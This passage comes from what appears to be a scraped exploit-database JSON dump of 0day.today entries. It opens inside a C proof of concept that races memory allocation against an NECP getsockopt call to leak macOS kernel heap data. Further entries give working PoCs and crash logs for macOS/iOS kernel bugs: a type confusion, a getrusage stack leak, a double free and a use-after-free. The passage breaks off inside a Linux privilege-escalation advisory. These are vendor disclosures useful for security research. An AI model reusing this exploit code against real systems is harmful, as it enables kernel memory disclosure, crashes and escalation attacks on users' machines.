sizeof(addr));\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not connect to the NECP control system (ID %d) \"\r\n \"unit %d: errno %d\", addr.sc_id, addr.sc_unit, errno);\r\n return false;\r\n }\r\n *necp_ctlfd = ctlfd;\r\n return true;\r\n}\r\n \r\n// Allocate a virtual memory region at the address pointed to by map_address. If map_address points\r\n// to a NULL address, then the allocation is created at an arbitrary address which is stored in\r\n// map_address on return.\r\nstatic bool allocate_map_address(void **map_address, size_t map_size) {\r\n mach_vm_address_t address = (mach_vm_address_t) *map_address;\r\n bool get_address = (address == 0);\r\n int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);\r\n kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);\r\n if (kr != KERN_SUCCESS) {\r\n ERROR(\"Could not allocate virtual memory: mach_vm_allocate %d: %s\",\r\n kr, mach_error_string(kr));\r\n return false;\r\n }\r\n if (get_address) {\r\n *map_address = (void *)address;\r\n }\r\n return true;\r\n}\r\n \r\n// Deallocate the mapping created by allocate_map_address.\r\nstatic void deallocate_map_address(void *map_address, size_t map_size) {\r\n mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);\r\n}\r\n \r\n// Context for the map_address_racer thread.\r\nstruct map_address_racer_context {\r\n pthread_t thread;\r\n volatile bool running;\r\n volatile bool deallocated;\r\n volatile bool do_map;\r\n volatile bool restart;\r\n bool success;\r\n void * address;\r\n size_t size;\r\n};\r\n \r\n// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map\r\n// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or\r\n// running to false. If the thread encounters an internal error, it sets success to false and\r\n// exits.\r\nstatic void *map_address_racer(void *arg) {\r\n struct map_address_racer_context *context = arg;\r\n while (context->running) {\r\n // Deallocate the address.\r\n deallocate_map_address(context->address, context->size);\r\n context->deallocated = true;\r\n // Wait for do_map to become true.\r\n while (!context->do_map) {}\r\n context->do_map = false;\r\n // Do a little bit of work so that the allocation is more likely to take place at\r\n // the right time.\r\n close(-1);\r\n // Re-allocate the address. If this fails, abort.\r\n bool success = allocate_map_address(&context->address, context->size);\r\n if (!success) {\r\n context->success = false;\r\n break;\r\n }\r\n // Wait while we're still running and not told to restart.\r\n while (context->running && !context->restart) {}\r\n context->restart = false;\r\n };\r\n return NULL;\r\n}\r\n \r\n// Start the map_address_racer thread.\r\nstatic bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {\r\n // Allocate the initial block of memory, fixing the address.\r\n context->address = NULL;\r\n context->size = leak_size;\r\n if (!allocate_map_address(&context->address, context->size)) {\r\n goto fail_0;\r\n }\r\n // Start the racer thread.\r\n context->running = true;\r\n context->deallocated = false;\r\n context->do_map = false;\r\n context->restart = false;\r\n context->success = true;\r\n int err = pthread_create(&context->thread, NULL, map_address_racer, context);\r\n if (err) {\r\n ERROR(\"Could not create map_address_racer thread: errno %d\", err);\r\n goto fail_1;\r\n }\r\n return true;\r\nfail_1:\r\n deallocate_map_address(context->address, context->size);\r\nfail_0:\r\n return false;\r\n}\r\n \r\n// Stop the map_address_racer thread.\r\nstatic void stop_map_address_racer(struct map_address_racer_context *context) {\r\n // Exit the thread.\r\n context->running = false;\r\n context->do_map = true;\r\n pthread_join(context->thread, NULL);\r\n // Deallocate the memory.\r\n deallocate_map_address(context->address, context->size);\r\n}\r\n \r\n// Try the NECP leak once. Returns true if the leak succeeded.\r\nstatic bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {\r\n socklen_t length = context->size;\r\n // Wait for the map to be deallocated.\r\n while (!context->deallocated) {};\r\n context->deallocated = false;\r\n // Signal the racer to do the mapping.\r\n context->do_map = true;\r\n // Try to trigger the leak.\r\n int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);\r\n if (err) {\r\n DEBUG_TRACE(\"Did not allocate in time\");\r\n return false;\r\n }\r\n // Most of the time we end up here: allocating too early. If the first two words are both\r\n // 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.\r\n uint64_t *data = context->address;\r\n if (data[0] == 0 && data[1] == 0) {\r\n return false;\r\n }\r\n // WOW! It worked!\r\n return true;\r\n}\r\n \r\n// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.\r\nstatic bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,\r\n struct map_address_racer_context *context) {\r\n const size_t MAX_TRIES = 10000000;\r\n bool has_leaked = false;\r\n for (size_t try = 1;; try++) {\r\n // Try the leak once.\r\n if (try_necp_leak(ctlfd, context)) {\r\n DEBUG_TRACE(\"Triggered the leak after %zu %s!\", try,\r\n (try == 1 ? \"try\" : \"tries\"));\r\n try = 0;\r\n has_leaked = true;\r\n // Give the leak to the callback, and finish if it says we're done.\r\n if (kernel_leak_callback(context->address, context->size)) {\r\n return true;\r\n }\r\n }\r\n // If we haven't successfully leaked anything after MAX_TRIES attempts, give up.\r\n if (!has_leaked && try >= MAX_TRIES) {\r\n ERROR(\"Giving up after %zu unsuccessful leak attempts\", try);\r\n return false;\r\n }\r\n // Reset for another try.\r\n context->restart = true;\r\n }\r\n}\r\n \r\n// Leak kernel heap data repeatedly until the callback function returns true.\r\nstatic bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {\r\n const size_t MIN_LEAK_SIZE = 16;\r\n bool success = false;\r\n if (leak_size < MIN_LEAK_SIZE) {\r\n ERROR(\"Target leak size too small; must be at least %zu bytes\", MIN_LEAK_SIZE);\r\n goto fail_0;\r\n }\r\n int ctlfd;\r\n if (!open_necp_control_socket(&ctlfd)) {\r\n goto fail_0;\r\n }\r\n struct map_address_racer_context context;\r\n if (!start_map_address_racer(&context, leak_size)) {\r\n goto fail_1;\r\n }\r\n if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {\r\n goto fail_2;\r\n }\r\n success = true;\r\nfail_2:\r\n stop_map_address_racer(&context);\r\nfail_1:\r\n close(ctlfd);\r\nfail_0:\r\n return success;\r\n}\r\n \r\n// ---- Main --------------------------------------------------------------------------------------\r\n \r\n// Dump data to stdout.\r\nstatic void dump(const void *data, size_t size) {\r\n const uint8_t *p = data;\r\n const uint8_t *end = p + size;\r\n unsigned off = 0;\r\n while (p < end) {\r\n printf(\"%06x: %02x\", off & 0xffffff, *p++);\r\n for (unsigned i = 1; i < 16 && p < end; i++) {\r\n bool space = (i % 8) == 0;\r\n printf(\" %s%02x\", (space ? \" \" : \"\"), *p++);\r\n }\r\n printf(\"\\n\");\r\n off += 16;\r\n }\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n // Parse the arguments.\r\n if (argc != 2) {\r\n ERROR(\"Usage: %s <leak-size>\", argv[0]);\r\n return 1;\r\n }\r\n char *end;\r\n size_t leak_size = strtoul(argv[1], &end, 0);\r\n if (*end != 0) {\r\n ERROR(\"Invalid leak size '%s'\", argv[1]);\r\n return 1;\r\n }\r\n // Try to leak interesting data from the kernel.\r\n const size_t MAX_TRIES = 50000;\r\n __block size_t try = 1;\r\n __block bool leaked = false;\r\n bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {\r\n // Try to find an kernel pointer in the leak.\r\n const uint64_t *p = leak;\r\n for (size_t i = 0; i < size / sizeof(*p); i++) {\r\n if (p[i] >> 48 == 0xffff) {\r\n dump(leak, size);\r\n leaked = true;\r\n return true;\r\n }\r\n }\r\n#if DEBUG\r\n // Show this useless leak anyway.\r\n DEBUG_TRACE(\"Boring leak:\");\r\n dump(leak, size);\r\n#endif\r\n // If we've maxed out, just bail.\r\n if (try >= MAX_TRIES) {\r\n ERROR(\"Could not leak interesting data after %zu attempts\", try);\r\n return true;\r\n }\r\n try++;\r\n return false;\r\n });\r\n return (success && leaked ? 0 : 1);\r\n}\n\n# 0day.today [2018-03-06] #", "sourceHref": "https://0day.today/exploit/29935", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-20T05:18:42", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS / iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in I", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13847"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29201", "href": "https://0day.today/exploit/description/29201", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1377 \r\n \r\n IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. \r\n \r\n IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor. \r\n IOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object. \r\n \r\n It is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another \r\n thread at the same time. \r\n \r\n IOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd, \r\n it also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs \r\n if you also call external methods which manipulate those arrays in other threads. \r\n \r\n For an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then \r\n used *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2 \r\n */ \r\n \r\n // ianbeer \r\n // build: clang -o timesync_uaf timesync_uaf.c -framework IOKit -lpthread \r\n // repro: while true; do ./timesync_uaf; done \r\n \r\n #if 0 \r\n MacOS multiple kernel UAFs due to incorrect IOKit object lifetime management in IOTimeSyncClockManagerUserClient \r\n \r\n IOTimeSyncClockManagerUserClient provides the userspace interface for the IOTimeSyncClockManager IOService. \r\n \r\n IOTimeSyncClockManagerUserClient overrides the IOUserClient::clientClose method but it treats it like a destructor. \r\n IOUserClient::clientClose is not a destructor and plays no role in the lifetime management of an IOKit object. \r\n \r\n It is perfectly possible to call ::clientClose (via io_service_close) in one thread and call an external method in another \r\n thread at the same time. \r\n \r\n IOTimeSyncClockManagerUserClient::clientClose drops references on a bunch of OSArrays causing them to be free'd, \r\n it also destroys the locks which are supposed to protect access to those arrays. This leads directly to multiple UaFs \r\n if you also call external methods which manipulate those arrays in other threads. \r\n \r\n For an exploit some care would be required to ensure correct interleaving such that the OSArray was destroyed and then \r\n used *before* the lock which is supposed to be protecting the array is also destroyed, but it would be quite possible. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/29201", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-16T09:17:58", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS necp_get_socket_attributes so_pcb Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13855"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29198", "href": "https://0day.today/exploit/description/29198", "sourceData": "MacOS so_pcb type confusion in necp_get_socket_attributes \r\n\r\nCVE-2017-13855\r\n\r\n\r\nWhen setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.\r\nnecp_get_socket_attributes() unconditionally calls sotoinpcb(so):\r\n\r\n errno_t\r\n necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)\r\n {\r\n int error = 0;\r\n u_int8_t *buffer = NULL;\r\n u_int8_t *cursor = NULL;\r\n size_t valsize = 0;\r\n struct inpcb *inp = sotoinpcb(so);\r\n\r\n if (inp->inp_necp_attributes.inp_domain != NULL) {\r\n valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);\r\n }\r\n [...]\r\n }\r\n\r\nsotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):\r\n\r\n #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)\r\n\r\nIf necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).\r\n\r\n\r\nTo trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).\r\n\r\n==============\r\n#include <sys/types.h>\r\n#include <sys/un.h>\r\n#include <sys/socket.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n\r\n#define SO_NECP_ATTRIBUTES 0x1109\r\n\r\nint main(void) {\r\n while (1) {\r\n int s = socket(AF_UNIX, SOCK_STREAM, 0);\r\n if (s == -1)\r\n err(1, \"socket\");\r\n getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);\r\n close(s);\r\n }\r\n}\r\n==============\r\n\r\nOn macOS 10.13 (17A405), this causes the following crash:\r\n\r\n==============\r\n*** Panic Report ***\r\npanic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:\r\nCR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0\r\nRAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc\r\nRSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8\r\n<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">R8</a>: 0x0000000000000001, <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">R9</a>: 0xffffffff00000000, <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">R10</a>: 0x0000000000000000, <a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">R11</a>: 0x0000000000000246\r\n<a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">R12</a>: 0xffffff80357cf7d0, <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">R13</a>: 0xffffff8032d69a08, <a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">R14</a>: 0xffffff8018de3ef0, <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">R15</a>: 0xffffff8032ac66a8\r\nRFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010\r\nFault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1\r\n==============\r\n\r\nThis bug should be usable for disclosing kernel memory.\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/29198", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-14T15:50:10", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS getrusage Stack Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29199", "href": "https://0day.today/exploit/description/29199", "sourceData": "MacOS getrusage stack leak through struct padding \r\n\r\nCVE-2017-13869\r\n\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\r\n\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29199", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T09:21:57", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS / iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13867"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29200", "href": "https://0day.today/exploit/description/29200", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1373 \r\n \r\n SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by \r\n \r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt) \r\n \r\n in flow_divert.c. \r\n \r\n The relevant code is: \r\n \r\n error = soopt_getm(sopt, &token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n error = soopt_mcopyin(sopt, token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n ... \r\n \r\n done: \r\n if (token != NULL) { \r\n mbuf_freem(token); \r\n } \r\n \r\n soopt_getm allocates an mbuf. \r\n \r\n soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code: \r\n \r\n error = copyin(sopt->sopt_val, mtod(m, char *), \r\n m->m_len); \r\n if (error != 0) { \r\n m_freem(m0); \r\n return (error); \r\n } \r\n \r\n This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin \r\n will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin \r\n returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed. \r\n \r\n mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing \r\n back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually \r\n exploit such an issue. \r\n \r\n This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect \r\n all double frees and this issue is still exploitable with sufficient grooming/cache manipulation. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2 \r\n */ \r\n \r\n // ianbeer \r\n \r\n #if 0 \r\n MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling \r\n \r\n SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by \r\n \r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt) \r\n \r\n in flow_divert.c. \r\n \r\n The relevant code is: \r\n \r\n error = soopt_getm(sopt, &token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n error = soopt_mcopyin(sopt, token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n ... \r\n \r\n done: \r\n if (token != NULL) { \r\n mbuf_freem(token); \r\n } \r\n \r\n soopt_getm allocates an mbuf. \r\n \r\n soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code: \r\n \r\n \t\t\terror = copyin(sopt->sopt_val, mtod(m, char *), \r\n \t\t\t m->m_len); \r\n \t\t\tif (error != 0) { \r\n \t\t\t\tm_freem(m0); \r\n \t\t\t\treturn (error); \r\n \t\t\t} \r\n \r\n This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin \r\n will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin \r\n returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed. \r\n \r\n mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing \r\n back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually \r\n exploit such an issue. \r\n \r\n This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect \r\n all double frees and this issue is still exploitable with sufficient grooming/cache manipulation. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/29200", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-08T01:44:19", "description": "A Linux PIE/stack corruption vulnerability exists. Most notably, all versions of CentOS 7 before 1708 (released on September 13, 2017), all versions of Red Hat Enterprise Linux 7 before 7.4 (released on August 1, 2017), and all versions of CentOS 6 and Red Hat Enterprise Linux 6 are exploitable.", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "zdt", "title": "Linux Local Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10002"], "modified": "2017-09-28T00:00:00", "id": "1337DAY-ID-28653", "href": "https://0day.today/exploit/description/28653", "sourceData": "Linux PIE/stack corruption (CVE-2017-1000253)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nAnalysis\r\nExploitation\r\nAcknowledgments\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nLinux distributions that have not patched their long-term kernels with\r\nhttps://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86\r\n(committed on April 14, 2015) are vulnerable to CVE-2017-1000253, a\r\nLocal Privilege Escalation.\r\n\r\nMost notably, all versions of CentOS 7 before 1708 (released on\r\nSeptember 13, 2017), all versions of Red Hat Enterprise Linux 7 before\r\n7.4 (released on August 1, 2017), and all versions of CentOS 6 and Red\r\nHat Enterprise Linux 6 are exploitable.\r\n\r\n\r\n========================================================================\r\nAnalysis\r\n========================================================================\r\n\r\n------------------------------------------------------------------------\r\nPre-Stack-Clash kernels\r\n------------------------------------------------------------------------\r\n\r\nOccasionally, we have noticed a strange behavior with PIEs\r\n(Position-Independent Executables) on CentOS 7:\r\n\r\nLinux localhost.localdomain 3.10.0-514.21.1.el7.x86_64 #1 SMP Thu May 25 17:04:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n\r\n7ffbad3b3000-7ffbad56a000 r-xp 00000000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad56a000-7ffbad769000 ---p 001b7000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad769000-7ffbad76d000 r--p 001b6000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad76d000-7ffbad76f000 rw-p 001ba000 fd:00 9066 /usr/lib64/libc-2.17.so\r\n7ffbad76f000-7ffbad774000 rw-p 00000000 00:00 0 \r\n7ffbad774000-7ffbad794000 r-xp 00000000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad967000-7ffbad98b000 rw-p 00000000 00:00 0 \r\n7ffbad990000-7ffbad991000 rw-p 00000000 00:00 0 \r\n7ffbad991000-7ffbad993000 r-xp 00000000 00:00 0 [vdso]\r\n7ffbad993000-7ffbad994000 r--p 0001f000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad994000-7ffbad995000 rw-p 00020000 fd:00 1229 /usr/lib64/ld-2.17.so\r\n7ffbad995000-7ffbad996000 rw-p 00000000 00:00 0 \r\n7ffbad996000-7ffbad998000 r-xp 00000000 fd:00 4194375 